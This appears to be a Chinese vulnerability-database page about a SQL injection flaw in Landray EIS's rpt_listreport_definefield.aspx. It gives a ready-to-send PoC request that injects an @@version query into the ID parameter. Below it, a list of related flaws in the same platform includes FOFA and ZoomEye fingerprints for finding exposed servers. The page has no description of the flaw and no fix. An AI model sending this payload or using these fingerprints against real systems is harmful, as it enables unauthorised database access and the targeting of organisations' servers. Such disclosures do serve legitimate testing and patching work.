蓝凌EIS rpt_listreport_definefield.aspx SQL注入漏洞

漏洞描述

PoC代码

GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1

相关漏洞推荐

• landray-eis-saveimg-fileupload: 蓝凌EIS智慧协同平台任意文件上传 POC

  2025-09-01 | 蓝凌EIS智慧协同平台
  FOFA: icon_hash="953405444" ZoomEye: app:"蓝凌EIS智慧协同平台"

• 蓝凌EIS validate 存在SQL注入漏洞 无POC

  2025-08-22 | 蓝凌EIS validate
  蓝凌EIS validate 存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。

• 蓝凌EIS智慧协同平台 /Mobile/mobile_send.aspx SQL 注入漏洞 无POC

  2025-08-21 | 蓝凌EIS智慧协同平台
  蓝凌EIS智慧协同平台是一款广泛应用于企业协同办公的管理平台。该漏洞存在于/Mobile/mobile_send.aspx接口中，攻击者可以通过构造恶意的SQL语句注入参数，获取数据库版本信息或执行其...

• landray-zhihuixietong-dingusers-sqli: 蓝凌EIS智慧协同平台DingUsers.aspx接口存在SQL注入漏洞 POC

  2025-09-01 | landray zhihuixietong
  蓝凌智慧协同平台eis集合了非常丰富的模块，满足组织企业在知识、协同、项目管理系统建设等需求。蓝凌EIS智慧协同平台DingUsers.aspx接口存在SQL注入漏洞 FOFA: body="...

• LemonLDAP::NG 操作系统命令注入漏洞 无POC

  2025-09-20 00:03:21 | LemonLDAP::NG
  LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...